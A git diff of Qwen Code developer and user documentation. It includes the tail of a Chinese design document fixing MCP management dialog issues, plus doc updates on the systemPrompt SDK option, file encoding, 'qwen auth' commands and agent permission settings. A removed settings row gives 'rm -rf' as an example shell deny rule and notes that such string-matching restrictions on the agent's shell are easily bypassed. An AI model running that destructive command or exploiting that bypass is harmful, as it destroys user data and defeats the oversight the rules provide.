只检查了连接状态,没有检查禁用状态 -2. 禁用的服务器不应该允许重新连接操作 -3. 逻辑上矛盾:既然禁用了就不应该尝试连接 - -#### 解决方案 - -**代码修改**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -const actions = useMemo(() => { - const result: Array<{ label: string; value: ServerAction }> = []; - - // View Tools 选项 - if (!server.isDisabled && server.toolCount > 0) { - result.push({ label: t('View Tools'), value: 'view-tools' }); - } - - // Reconnect 选项:只在未禁用且断开连接时显示 - if (!server.isDisabled && server.status === MCPServerStatus.DISCONNECTED) { - result.push({ label: t('Reconnect'), value: 'reconnect' }); - } - - // Enable/Disable 选项 - result.push({ - label: server.isDisabled ? 
t('Enable Server') : t('Disable Server'), - value: 'toggle-disable', - }); - - return result; -}, [server]); -``` - -**同时在 ServerListStep 中添加视觉提示**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerListStep.tsx -{server.isDisabled && ( - - {' '} - {t('(disabled - no connection possible)')} - -)} -``` - ---- - -### 问题 3: 【P1】禁用有个选择设置的 dialog,有点费解 - -#### 问题描述 - -- **现象**: 禁用服务器时会弹出一个对话框让用户选择禁用范围 (user/workspace) -- **问题**: 这个选择让用户体验困惑,特别是当 MCP server 在项目级配置时,在用户级别禁用就有点费解 -- **文档建议**: MCP server 在哪里,就在哪里禁用(如果 MCP server 在项目级,在用户级别禁用就有点费解) - -#### 根本原因分析 - -当前实现逻辑: - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -const handleSelectDisableScope = useCallback( - async (scope: 'user' | 'workspace') => { - // 允许用户在 user 或 workspace 层面禁用服务器 - // 即使服务器配置在 workspace 层面,也允许在 user 层面禁用 - }, - [config, selectedServer, handleNavigateBack, reloadServers], -); -``` - -问题在于: - -1. 用户可以跨 scope 禁用服务器,造成配置混乱 -2. 不符合"在哪里配置就在哪里管理"的直觉 -3. 增加了不必要的复杂性 - -#### 解决方案 - -**方案 A: 根据服务器来源自动确定禁用 scope (强烈推荐)** - -**核心思路**: - -- User 级别的配置 → 只能在 User 级别禁用 -- Workspace 级别的配置 → 只能在 Workspace 级别禁用 -- Extension 级别的配置 → 不允许禁用 (只能卸载扩展) - -**代码修改**: - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx - -// 修改 handleDisable 函数 -const handleDisable = useCallback(() => { - if (!selectedServer) return; - - // 如果服务器已经被禁用,直接启用 - if (selectedServer.isDisabled) { - void handleEnableServer(); - return; - } - - // Extension 提供的服务器不允许禁用 - if (selectedServer.source === 'extension') { - debugLogger.warn( - `Cannot disable extension-provided server '${selectedServer.name}'`, - ); - // 显示提示信息 - return; - } - - // 根据服务器 scope 直接禁用,不再询问 - const scope = - selectedServer.scope === 'extension' - ? SettingScope.User - : selectedServer.scope === 'workspace' - ? 
SettingScope.Workspace - : SettingScope.User; - - // 直接执行禁用操作 - void executeDisable(scope); -}, [selectedServer, handleEnableServer]); - -// 新增执行禁用函数 -const executeDisable = useCallback( - async (scope: SettingScope) => { - if (!config || !selectedServer) return; - - try { - setIsLoading(true); - - const settings = loadSettings(); - const scopeSettings = settings.forScope(scope).settings; - const currentExcluded = scopeSettings.mcp?.excluded || []; - - if (!currentExcluded.includes(selectedServer.name)) { - const newExcluded = [...currentExcluded, selectedServer.name]; - settings.setValue(scope, 'mcp.excluded', newExcluded); - } - - const toolRegistry = config.getToolRegistry(); - if (toolRegistry) { - await toolRegistry.disableMcpServer(selectedServer.name); - } - - await reloadServers(); - handleNavigateBack(); - } catch (error) { - debugLogger.error( - `Error disabling server '${selectedServer.name}':`, - error, - ); - } finally { - setIsLoading(false); - } - }, - [config, selectedServer, reloadServers, handleNavigateBack], -); - -// 移除 DisableScopeSelectStep 相关的代码和导航逻辑 -``` - -**同时修改 UI 提示**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx - - - {t('Scope:')} - - - - {t(server.scope)} - {server.source === 'extension' && ( - - {' '}({t('provided by {{name}}', { name: server.config.extensionName })}) - - )} - - - - -// 禁用按钮文本根据 scope 调整 -{server.isDisabled ? ( - {t('Enable (will remove from exclusion list)')} -) : server.source === 'extension' ? ( - {t('Cannot disable extension server')} -) : ( - {t('Disable (in {{scope}})', { scope: server.scope })} -)} -``` - -**方案 B: 保留选择但改进 UX** - -如果确实需要支持跨 scope 禁用 (考虑到某些特殊场景),至少应该: - -1. 明确显示当前服务器的配置位置 -2. 说明不同选择的影响 -3. 给出推荐选项 - -但这会增加复杂性,不如方案 A 简洁明了。 - -#### 推荐方案:方案 A - ---- - -## 实施计划 - ---- - -## 问题 6: 【P2】Extension Management - /extension manage 报错 - -### 问题描述 - -- **现象**: 使用 `/extension manage` 命令时直接报错 -- **期望**: 应该能正常打开 Extension Management Dialog - -### 根本原因分析 - -#### 可能的原因 - -1. 
**命令拼写错误** (最可能) - - 正确的命令是 `/extensions manage` (复数形式) - - 用户可能输入了 `/extension manage` (单数形式) -2. **ExtensionManager 未正确初始化** - - ```typescript - // packages/cli/src/ui/commands/extensionsCommand.ts#L103-108 - async function listAction(_context: CommandContext, _args: string) { - const extensionManager = context.services.config?.getExtensionManager(); - if (!(extensionManager instanceof ExtensionManager)) { - debugLogger.error( - `Cannot ${context.invocation?.name} extensions in this environment`, - ); - return; // ❌ 这里直接返回,没有给用户任何提示 - } - // ... - } - ``` - -3. **环境限制** - - 某些环境下无法加载 ExtensionManager - - 沙箱模式可能限制扩展管理功能 - -#### 当前错误处理问题 - -- 如果 `getExtensionManager()` 返回 null 或不是 ExtensionManager 实例 -- 代码只是记录 debug 日志并静默返回 -- **用户看不到任何错误提示**,只会感到困惑 - -### 解决方案 - -#### 方案 A: 改进错误提示 (强烈推荐) - -**代码修改**: - -```typescript -// packages/cli/src/ui/commands/extensionsCommand.ts -async function listAction(context: CommandContext, _args: string) { - const extensionManager = context.services.config?.getExtensionManager(); - - if (!(extensionManager instanceof ExtensionManager)) { - debugLogger.error( - `Cannot ${context.invocation?.name} extensions in this environment`, - ); - - // ✅ 添加用户友好的错误提示 - context.ui.addItem( - { - type: MessageType.ERROR, - text: t( - 'Extension management is not available in the current environment. ' + - 'This feature may not be supported in your current mode or configuration.', - ), - }, - Date.now(), - ); - return; - } - - return { - type: 'dialog' as const, - dialog: 'extensions_manage' as const, - }; -} -``` - -#### 方案 B: 检查命令拼写并给出提示 - -在命令解析层面添加提示: - -```typescript -// packages/cli/src/ui/commands/registry.ts 或相关位置 -// 当检测到用户输入 '/extension'(单数) 时,给出提示 -if (commandName === 'extension') { - context.ui.addItem( - { - type: MessageType.INFO, - text: t('Did you mean "/extensions"? 
(plural form)'), - }, - Date.now(), - ); -} -``` - -#### 方案 C: 同时支持单复数形式 - -为了用户体验,可以同时支持两种形式: - -```typescript -// packages/cli/src/ui/commands/extensionsCommand.ts -export const extensionsCommand: SlashCommand = { - name: 'extensions', // 主要命令 (复数) - aliases: ['extension'], // ✅ 添加别名 (单数) - get description() { - return t('Manage extensions'); - }, - kind: CommandKind.BUILT_IN, - subCommands: [ - manageExtensionsCommand, - installCommand, - exploreExtensionsCommand, - ], - action: async (context, args) => - manageExtensionsCommand.action!(context, args), -}; -``` - -**注意**: 需要检查 SlashCommand 类型定义是否支持 `aliases` 属性 - -### 推荐方案 - -**采用方案 A + 方案 C**: - -1. 改进错误提示,让用户知道发生了什么 -2. 如果可能,同时支持单复数形式 - ---- - -## 实施计划 - -### Phase 1: 修复异常状态问题 (优先级:高) - -1. **修复问题 2.1**: 禁用后可查看工具 - - 修改 `ServerDetailStep.tsx` 的操作列表逻辑 - - 修改 `ToolListStep.tsx` 添加友好提示 - - 预计工时:2 小时 - -2. **修复问题 2.2**: 禁用后可重新连接 - - 修改 `ServerDetailStep.tsx` 的 reconnect 选项条件 - - 预计工时:1 小时 - -### Phase 2: 在 Dialog 中集成 Auth 功能 (优先级:高) - -3. **修复问题 1**: MCP Dialog 集成 OAuth 认证 - - 扩展 `MCP_MANAGEMENT_STEPS` 添加认证步骤 - - 在 `ServerDetailStep` 中添加"Authenticate"选项 - - 在 `MCPManagementDialog` 中实现认证逻辑 - - 更新 i18n 翻译文件 - - 预计工时:4 小时 - -### Phase 3: 改进禁用体验 (优先级:中) - -4. **修复问题 3**: 简化禁用流程 - - 移除 `DisableScopeSelectStep` - - 实现自动 scope 判断逻辑 - - 更新 UI 提示 - - 预计工时:4 小时 - -### Phase 4: UI 细节优化 (优先级:中) - -5. **修复问题 4**: Dialog 1 细节优化 - - 移除重复的来源显示 - - 优化错误信息显示逻辑 (只在有错误时显示) - - 移除多余的空格 - - 优化布局紧凑度 - - 预计工时:3 小时 - -6. **修复问题 5**: Dialog 2 细节优化 - - 统一来源颜色与其他部分一致 - - 添加功能说明 tooltip - - 统一选中色为 theme.text.accent - - 优化工具标注文案 (如"destructive, open-world") - - 移除不必要的序号 - - 预计工时:3 小时 - -### Phase 5: Extension Management 修复 (优先级:低) - -7. **修复问题 6**: Extension 命令报错 - - 改进错误提示 (方案 A) - - 考虑支持单复数形式 (方案 C) - - 预计工时:2 小时 - -### Phase 6: 测试与验证 (优先级:高) - -8. 
**回归测试** - - 更新所有相关测试用例 - - 手动测试各个场景 - - 确保没有破坏性变更 - - 预计工时:4 小时 - -**总预计工时**: 约 23 小时 (约 3 个工作日) - ---- - -## 影响评估 - -### 兼容性影响 - -- **Breaking Changes**: 无 -- **Deprecation**: 无 -- **新功能**: MCP Dialog 集成 OAuth 认证功能 - -### 需要更新的文档 - -1. `docs/developers/tools/mcp-server.md` - 更新 MCP 管理对话框使用说明 -2. `docs/users/features/mcp-servers.md` - 更新用户指南 -3. `docs/users/features/extensions.md` - 更新扩展管理说明 -4. 内联帮助文本和 i18n 文件 - -### 需要更新的测试 - -1. `packages/cli/src/ui/commands/mcpCommand.test.ts` -2. `packages/cli/src/ui/components/mcp/MCPManagementDialog.test.tsx` -3. `packages/cli/src/ui/components/mcp/steps/ServerDetailStep.test.tsx` -4. `packages/cli/src/ui/commands/extensionsCommand.test.ts` -5. `packages/cli/src/ui/components/extensions/ExtensionsManagerDialog.test.tsx` - ---- - -## 验收标准 - -### 问题 1 验收标准 - -- [ ] MCP Management Dialog 中显示"Authenticate"选项 (针对需要认证的服务器) -- [ ] 点击认证后能正确启动 OAuth 流程 -- [ ] 认证过程中显示友好的提示信息 -- [ ] 认证成功后自动刷新服务器状态 -- [ ] 认证失败时显示明确的错误信息 -- [ ] 保留 `/mcp auth` 命令作为备选方案 (可选) - -### 问题 2.1 验收标准 - -- [ ] 禁用的服务器不显示"查看工具"选项,或显示友好提示 -- [ ] 工具列表为空时,明确提示原因 -- [ ] 用户不会看到空的工具列表页面 - -### 问题 2.2 验收标准 - -- [ ] 禁用的服务器不显示"重新连接"选项 -- [ ] UI 逻辑自洽,不会出现矛盾的操作选项 -- [ ] 禁用状态下只能看到"启用"选项 - -### 问题 3 验收标准 - -- [ ] 禁用操作一键完成,无需选择 scope -- [ ] 禁用范围自动匹配配置范围 -- [ ] UI 明确显示服务器的配置位置 -- [ ] 用户体验流畅,无困惑点 - -### 问题 4 验收标准 (Dialog 1 细节优化) - -- [ ] 移除重复的来源显示 -- [ ] 只在有错误时显示"运行 qwen --debug..."提示 -- [ ] 没有错误时不显示多余的空格 -- [ ] 布局更加紧凑,接近 claude code 的视觉效果 - -### 问题 5 验收标准 (Dialog 2 细节优化) - -- [ ] 来源颜色与其他部分统一 -- [ ] 添加清晰的功能说明 -- [ ] 统一选中色为 theme.text.accent -- [ ] 工具标注文案更易懂 (如改为"Destructive, Open-world") -- [ ] 移除列表项前的序号 (1、2、3...) 
- -### 问题 6 验收标准 (Extension Management) - -- [ ] `/extensions manage` 命令能正常工作 -- [ ] 如果 ExtensionManager 不可用,显示明确的错误提示 -- [ ] 考虑支持 `/extension`(单数) 作为别名 (可选) -- [ ] 测试不同环境下的行为 (普通模式、沙箱模式等) - ---- - -## 技术细节补充 - -### 关键文件清单 - -``` -# MCP Management -packages/cli/src/ui/commands/mcpCommand.ts -packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -packages/cli/src/ui/components/mcp/steps/ServerListStep.tsx -packages/cli/src/ui/components/mcp/steps/ToolListStep.tsx -packages/cli/src/ui/components/mcp/types.ts -packages/core/src/tools/mcp-client-manager.ts -packages/core/src/config/config.ts - -# Extension Management -packages/cli/src/ui/commands/extensionsCommand.ts -packages/cli/src/ui/components/extensions/ExtensionsManagerDialog.tsx -packages/cli/src/ui/components/extensions/types.ts -packages/core/src/extension/extensionManager.ts -``` - -### 依赖关系 - -- MCP Management Dialog 依赖于 Config、ToolRegistry、PromptRegistry -- 禁用逻辑涉及 Settings 的多 scope 管理 -- 状态跟踪通过 `getMCPServerStatus` 和状态监听器实现 - -### 潜在风险点 - -1. **OAuth 认证流程**: 确保在 Dialog 中集成的认证功能不影响现有命令行认证 -2. **多 Scope 配置**: 确保自动 scope 判断不会误删其他 scope 的配置 -3. **Extension 集成**: 确保扩展提供的服务器正确处理 -4. **环境兼容性**: 确保 Extension Management 在不同环境下都能给出正确的错误提示 - ---- - -## 总结 - -本文档针对 0.12.0 版本体验反馈中提出的 **6 个问题** (3 个 P1 + 3 个 P2) 进行了详细分析,并提供了具体的解决方案。所有修改都遵循以下原则: - -1. **用户体验优先**: 简化操作流程,减少困惑 -2. **逻辑一致性**: 确保 UI 状态和行为逻辑自洽 -3. **向后兼容**: 避免破坏性变更 -4. **代码质量**: 简化代码结构,提高可维护性 -5. **错误友好**: 提供清晰、有帮助的错误信息 - -建议按优先级分阶段实施,确保每个问题都得到妥善解决。 diff --git a/docs/developers/development/telemetry.md b/docs/developers/development/telemetry.md index f5faee40e..94859048e 100644 --- a/docs/developers/development/telemetry.md +++ b/docs/developers/development/telemetry.md @@ -139,16 +139,16 @@ Logs are timestamped records of specific events. The following events are logged - `qwen-code.config`: This event occurs once at startup with the CLI's configuration. 
- **Attributes**: - `model` (string) - - `embedding_model` (string) - `sandbox_enabled` (boolean) - `core_tools_enabled` (string) - `approval_mode` (string) - - `api_key_enabled` (boolean) - - `vertex_ai_enabled` (boolean) - - `code_assist_enabled` (boolean) - - `log_prompts_enabled` (boolean) - `file_filtering_respect_git_ignore` (boolean) - `debug_mode` (boolean) + - `truncate_tool_output_threshold` (number) + - `truncate_tool_output_lines` (number) + - `hooks` (string, comma-separated hook event types, omitted if hooks disabled) + - `ide_enabled` (boolean) + - `interactive_shell_enabled` (boolean) - `mcp_servers` (string) - `output_format` (string: "text" or "json") diff --git a/docs/developers/sdk-typescript.md b/docs/developers/sdk-typescript.md index 46625e840..4c705f068 100644 --- a/docs/developers/sdk-typescript.md +++ b/docs/developers/sdk-typescript.md @@ -63,6 +63,7 @@ Creates a new query session with the Qwen Code. | `permissionMode` | `'default' \| 'plan' \| 'auto-edit' \| 'yolo'` | `'default'` | Permission mode controlling tool execution approval. See [Permission Modes](#permission-modes) for details. | | `canUseTool` | `CanUseTool` | - | Custom permission handler for tool execution approval. Invoked when a tool requires confirmation. Must respond within 60 seconds or the request will be auto-denied. See [Custom Permission Handler](#custom-permission-handler). | | `env` | `Record` | - | Environment variables to pass to the Qwen Code process. Merged with the current process environment. | +| `systemPrompt` | `string \| QuerySystemPromptPreset` | - | System prompt configuration for the main session. Use a string to fully override the built-in Qwen Code system prompt, or a preset object to keep the built-in prompt and append extra instructions. | | `mcpServers` | `Record` | - | MCP (Model Context Protocol) servers to connect. Supports external servers (stdio/SSE/HTTP) and SDK-embedded servers. 
External servers are configured with transport options like `command`, `args`, `url`, `httpUrl`, etc. SDK servers use `{ type: 'sdk', name: string, instance: Server }`. | | `abortController` | `AbortController` | - | Controller to cancel the query session. Call `abortController.abort()` to terminate the session and cleanup resources. | | `debug` | `boolean` | `false` | Enable debug mode for verbose logging from the CLI process. | @@ -248,6 +249,36 @@ const result = query({ }); ``` +### Override the System Prompt + +```typescript +import { query } from '@qwen-code/sdk'; + +const result = query({ + prompt: 'Say hello in one sentence.', + options: { + systemPrompt: 'You are a terse assistant. Answer in exactly one sentence.', + }, +}); +``` + +### Append to the Built-in System Prompt + +```typescript +import { query } from '@qwen-code/sdk'; + +const result = query({ + prompt: 'Review the current directory.', + options: { + systemPrompt: { + type: 'preset', + preset: 'qwen_code', + append: 'Be terse and focus on concrete findings.', + }, + }, +}); +``` + ### With SDK-Embedded MCP Servers The SDK provides `tool` and `createSdkMcpServer` to create MCP servers that run in the same process as your SDK application. This is useful when you want to expose custom tools to the AI without running a separate server process. diff --git a/docs/developers/tools/file-system.md b/docs/developers/tools/file-system.md index bfa6de8d0..118f5e0b6 100644 --- a/docs/developers/tools/file-system.md +++ b/docs/developers/tools/file-system.md @@ -24,7 +24,7 @@ Qwen Code provides a comprehensive suite of tools for interacting with the local ## 2. `read_file` (ReadFile) -`read_file` reads and returns the content of a specified file. This tool handles text, images (PNG, JPG, GIF, WEBP, SVG, BMP), and PDF files. For text files, it can read specific line ranges. Other binary file types are generally skipped. +`read_file` reads and returns the content of a specified file. 
This tool handles text files and media files (images, PDFs, audio, video) whose modality is supported by the current model. For text files, it can read specific line ranges. Media files whose modality is not supported by the current model are rejected with a helpful error message. Other binary file types are generally skipped. - **Tool name:** `read_file` - **Display name:** ReadFile @@ -35,11 +35,12 @@ Qwen Code provides a comprehensive suite of tools for interacting with the local - `limit` (number, optional): For text files, the maximum number of lines to read. If omitted, reads a default maximum (e.g., 2000 lines) or the entire file if feasible. - **Behavior:** - For text files: Returns the content. If `offset` and `limit` are used, returns only that slice of lines. Indicates if content was truncated due to line limits or line length limits. - - For image and PDF files: Returns the file content as a base64-encoded data structure suitable for model consumption. + - For media files (images, PDFs, audio, video): If the current model supports the file's modality, returns the file content as a base64-encoded `inlineData` object. If the model does not support the modality, returns an error message with guidance (e.g., suggesting skills or external tools). - For other binary files: Attempts to identify and skip them, returning a message indicating it's a generic binary file. - **Output:** (`llmContent`): - For text files: The file content, potentially prefixed with a truncation message (e.g., `[File content truncated: showing lines 1-100 of 500 total lines...]\nActual file content...`). - - For image/PDF files: An object containing `inlineData` with `mimeType` and base64 `data` (e.g., `{ inlineData: { mimeType: 'image/png', data: 'base64encodedstring' } }`). + - For supported media files: An object containing `inlineData` with `mimeType` and base64 `data` (e.g., `{ inlineData: { mimeType: 'image/png', data: 'base64encodedstring' } }`). 
+ - For unsupported media files: An error message string explaining that the current model does not support this modality, with suggestions for alternatives. - For other binary files: A message like `Cannot display content of binary file: /path/to/data.bin`. - **Confirmation:** No. @@ -164,4 +165,63 @@ grep_search(pattern="function", glob="*.js", limit=10) - On failure: An error message explaining the reason (e.g., `Failed to edit, 0 occurrences found...`, `Failed to edit because the text matches multiple locations...`). - **Confirmation:** Yes. Shows a diff of the proposed changes and asks for user approval before writing to the file. +## File encoding and platform-specific behavior + +### Encoding detection and preservation + +When reading files, Qwen Code detects the file's encoding using a multi-step strategy: + +1. **UTF-8** — tried first (most modern tooling outputs UTF-8) +2. **chardet** — statistical detection for non-UTF-8 content +3. **System encoding** — falls back to the OS code page (Windows `chcp` / Unix `LANG`) + +Both `write_file` and `edit` preserve the original encoding and BOM (byte order mark) of existing files. For example, a file that was read as GBK is written back as GBK, and a UTF-8 file that had a BOM is written back with its BOM. + +### Configuring default encoding for new files + +The `defaultFileEncoding` setting controls encoding for **newly created** files (not edits to existing files): + +| Value | Behavior | +| ----------- | --------------------------------------------------------------------------- | +| _(not set)_ | UTF-8 without BOM, with automatic platform-specific adjustments (see below) | +| `utf-8` | UTF-8 without BOM, no automatic adjustments | +| `utf-8-bom` | UTF-8 with BOM for all new files | + +Set it in `.qwen/settings.json` or `~/.qwen/settings.json`: + +```json +{ + "general": { + "defaultFileEncoding": "utf-8-bom" + } +} +``` + +### Windows: CRLF for batch files + +On Windows, `.bat` and `.cmd` files are automatically written with CRLF (`\r\n`) line endings.
This is required because `cmd.exe` uses CRLF as its line delimiter — LF-only endings can break multi-line `if`/`else`, `goto` labels, and `for` loops. This applies regardless of encoding settings and only on Windows. + +### Windows: UTF-8 BOM for PowerShell scripts + +On Windows with a **non-UTF-8 system code page** (e.g. GBK/cp936, Big5/cp950, Shift_JIS/cp932), newly created `.ps1` files are automatically written with a UTF-8 BOM. This is necessary because Windows PowerShell 5.1 (the version built into Windows 10/11) reads BOM-less scripts using the system's ANSI code page. Without a BOM, any non-ASCII characters in the script will be misinterpreted. + +This automatic BOM only applies when: + +- The platform is Windows +- The system code page is not UTF-8 (not code page 65001) +- The file is a new `.ps1` file (existing files keep their original encoding) +- The user has **not** explicitly set `defaultFileEncoding` in settings + +PowerShell 7+ (pwsh) defaults to UTF-8 and handles BOM transparently, so the BOM is harmless there. + +If you explicitly set `defaultFileEncoding` to `"utf-8"`, the automatic BOM is disabled — this is an intentional escape hatch for repositories or tooling that reject BOMs. + +### Summary + +| File type | Platform | Automatic behavior | +| -------------- | ----------------------------- | --------------------------- | +| `.bat`, `.cmd` | Windows | CRLF line endings | +| `.ps1` | Windows (non-UTF-8 code page) | UTF-8 BOM on new files | +| All others | All | UTF-8 without BOM (default) | + These file system tools provide a foundation for Qwen Code to understand and interact with your local project context. 
diff --git a/docs/users/configuration/auth.md b/docs/users/configuration/auth.md index 3e15aa462..445e42bc5 100644 --- a/docs/users/configuration/auth.md +++ b/docs/users/configuration/auth.md @@ -21,6 +21,12 @@ Start the CLI and follow the browser flow: qwen ``` +Or authenticate directly without starting a session: + +```bash +qwen auth qwen-oauth +``` + > [!note] > > In non-interactive or headless environments (e.g., CI, SSH, containers), you typically **cannot** complete the OAuth browser login flow. @@ -44,6 +50,20 @@ Alibaba Cloud Coding Plan is available in two regions: ### Interactive setup +You can set up Coding Plan authentication in two ways: + +**Option A: From the terminal (recommended for first-time setup)** + +```bash +# Interactive — prompts for region and API key +qwen auth coding-plan + +# Or non-interactive — pass region and key directly +qwen auth coding-plan --region china --key sk-sp-xxxxxxxxx +``` + +**Option B: Inside a Qwen Code session** + Enter `qwen` in the terminal to launch Qwen Code, then run the `/auth` command and select **Alibaba Cloud Coding Plan**. Choose your region, then enter your `sk-sp-xxxxxxxxx` key. After authentication, use the `/model` command to switch between all Alibaba Cloud Coding Plan supported models (including qwen3.5-plus, qwen3-coder-plus, qwen3-coder-next, qwen3-max, glm-4.7, and kimi-k2.5). @@ -290,6 +310,55 @@ qwen --model "qwen3-coder-plus" qwen --model "qwen3.5-plus" ``` +## `qwen auth` CLI command + +In addition to the in-session `/auth` slash command, Qwen Code provides a standalone `qwen auth` CLI command for managing authentication directly from the terminal — without starting an interactive session first. 
+ +### Interactive mode + +Run `qwen auth` without arguments to get an interactive menu: + +```bash +qwen auth +``` + +You'll see a selector with arrow-key navigation: + +``` +Select authentication method: + +> Qwen OAuth - Free · Up to 1,000 requests/day · Qwen latest models + Alibaba Cloud Coding Plan - Paid · Up to 6,000 requests/5 hrs · All Alibaba Cloud Coding Plan Models + +(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit) +``` + +### Subcommands + +| Command | Description | +| ---------------------------------------------------- | ------------------------------------------------- | +| `qwen auth` | Interactive authentication setup | +| `qwen auth qwen-oauth` | Authenticate with Qwen OAuth | +| `qwen auth coding-plan` | Authenticate with Alibaba Cloud Coding Plan | +| `qwen auth coding-plan --region china --key sk-sp-…` | Non-interactive Coding Plan setup (for scripting) | +| `qwen auth status` | Show current authentication status | + +**Examples:** + +```bash +# Authenticate with Qwen OAuth directly +qwen auth qwen-oauth + +# Set up Coding Plan interactively (prompts for region and key) +qwen auth coding-plan + +# Set up Coding Plan non-interactively (useful for CI/scripting) +qwen auth coding-plan --region china --key sk-sp-xxxxxxxxx + +# Check your current auth configuration +qwen auth status +``` + ## Security notes - Don't commit API keys to version control. diff --git a/docs/users/configuration/settings.md b/docs/users/configuration/settings.md index c648a231f..1c7c20404 100644 --- a/docs/users/configuration/settings.md +++ b/docs/users/configuration/settings.md @@ -129,7 +129,6 @@ Settings are organized into categories. 
All settings should be placed within the | -------------------------------------------------- | ------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------- | | `model.name` | string | The Qwen model to use for conversations. | `undefined` | | `model.maxSessionTurns` | number | Maximum number of user/model/tool turns to keep in a session. -1 means unlimited. | `-1` | -| `model.summarizeToolOutput` | object | Enables or disables the summarization of tool output. You can specify the token budget for the summarization using the `tokenBudget` setting. Note: Currently only the `run_shell_command` tool is supported. For example `{"run_shell_command": {"tokenBudget": 2000}}` | `undefined` | | `model.generationConfig` | object | Advanced overrides passed to the underlying content generator. Supports request controls such as `timeout`, `maxRetries`, `enableCacheControl`, `contextWindowSize` (override model's context window size), `modalities` (override auto-detected input modalities), `customHeaders` (custom HTTP headers for API requests), and `extra_body` (additional body parameters for OpenAI-compatible API requests only), along with fine-tuning knobs under `samplingParams` (for example `temperature`, `top_p`, `max_tokens`). Leave unset to rely on provider defaults. | `undefined` | | `model.chatCompression.contextPercentageThreshold` | number | Sets the threshold for chat history compression as a percentage of the model's total token limit. 
This is a value between 0 and 1 that applies to both automatic compression and the manual `/compress` command. For example, a value of `0.6` will trigger compression when the chat history exceeds 60% of the token limit. Use `0` to disable compression entirely. | `0.7` | | `model.skipNextSpeakerCheck` | boolean | Skip the next speaker check. | `false` | @@ -213,18 +212,114 @@ If you are experiencing performance issues with file searching (e.g., with `@` c | ------------------------------------ | ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `tools.sandbox` | boolean or string | Sandbox execution environment (can be a boolean or a path string). | `undefined` | | | `tools.shell.enableInteractiveShell` | boolean | Use `node-pty` for an interactive shell experience. Fallback to `child_process` still applies. | `false` | | -| `tools.core` | array of strings | This can be used to restrict the set of built-in tools with an allowlist. 
You can also specify command-specific restrictions for tools that support it, like the `run_shell_command` tool. For example, `"tools.core": ["run_shell_command(ls -l)"]` will only allow the `ls -l` command to be executed. | `undefined` | | -| `tools.exclude` | array of strings | Tool names to exclude from discovery. You can also specify command-specific restrictions for tools that support it, like the `run_shell_command` tool. For example, `"tools.exclude": ["run_shell_command(rm -rf)"]` will block the `rm -rf` command. **Security Note:** Command-specific restrictions in `tools.exclude` for `run_shell_command` are based on simple string matching and can be easily bypassed. This feature is **not a security mechanism** and should not be relied upon to safely execute untrusted code. It is recommended to use `tools.core` to explicitly select commands that can be executed. | `undefined` | | -| `tools.allowed` | array of strings | A list of tool names that will bypass the confirmation dialog. This is useful for tools that you trust and use frequently. For example, `["run_shell_command(git)", "run_shell_command(npm test)"]` will skip the confirmation dialog to run any `git` and `npm test` commands. | `undefined` | | +| `tools.core` | array of strings | **Deprecated.** It will be removed in the next version. Use `permissions.allow` + `permissions.deny` instead. Restricts built-in tools to an allowlist. All tools not in the list are disabled. | `undefined` | | +| `tools.exclude` | array of strings | **Deprecated.** Use `permissions.deny` instead. Tool names to exclude from discovery. Automatically migrated to the `permissions` format on first load. | `undefined` | | +| `tools.allowed` | array of strings | **Deprecated.** Use `permissions.allow` instead. Tool names that bypass the confirmation dialog. Automatically migrated to the `permissions` format on first load. | `undefined` | | | `tools.approvalMode` | string | Sets the default approval mode for tool usage.
| `default` | Possible values: `plan` (analyze only, do not modify files or execute commands), `default` (require approval before file edits or shell commands run), `auto-edit` (automatically approve file edits), `yolo` (automatically approve all tool calls) | | `tools.discoveryCommand` | string | Command to run for tool discovery. | `undefined` | | | `tools.callCommand` | string | Defines a custom shell command for calling a specific tool that was discovered using `tools.discoveryCommand`. The shell command must meet the following criteria: It must take function `name` (exactly as in [function declaration](https://ai.google.dev/gemini-api/docs/function-calling#function-declarations)) as first command line argument. It must read function arguments as JSON on `stdin`, analogous to [`functionCall.args`](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/inference#functioncall). It must return function output as JSON on `stdout`, analogous to [`functionResponse.response.content`](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/inference#functionresponse). | `undefined` | | | `tools.useRipgrep` | boolean | Use ripgrep for file content search instead of the fallback implementation. Provides faster search performance. | `true` | | | `tools.useBuiltinRipgrep` | boolean | Use the bundled ripgrep binary. When set to `false`, the system-level `rg` command will be used instead. This setting is only effective when `tools.useRipgrep` is `true`. | `true` | | -| `tools.enableToolOutputTruncation` | boolean | Enable truncation of large tool outputs. | `true` | Requires restart: Yes | | `tools.truncateToolOutputThreshold` | number | Truncate tool output if it is larger than this many characters. Applies to Shell, Grep, Glob, ReadFile and ReadManyFiles tools. | `25000` | Requires restart: Yes | | `tools.truncateToolOutputLines` | number | Maximum lines or entries kept when truncating tool output. 
Applies to Shell, Grep, Glob, ReadFile and ReadManyFiles tools. | `1000` | Requires restart: Yes | +> [!note] +> +> **Migrating from `tools.core` / `tools.exclude` / `tools.allowed`:** These legacy settings are **deprecated** and automatically migrated to the new `permissions` format on first load. Prefer configuring `permissions.allow` / `permissions.deny` directly. Use `/permissions` to manage rules interactively. + +#### permissions + +The permissions system provides fine-grained control over which tools can run, which require confirmation, and which are blocked. + +**Decision priority (highest first): `deny` > `ask` > `allow` > _(default/interactive mode)_** + +The first matching rule wins. Rules use the format `"ToolName"` or `"ToolName(specifier)"`. + +| Setting | Type | Description | Default | +| ------------------- | ---------------- | ---------------------------------------------------------------------------------------------------------------- | ----------- | +| `permissions.allow` | array of strings | Rules for auto-approved tool calls (no confirmation needed). Merged across 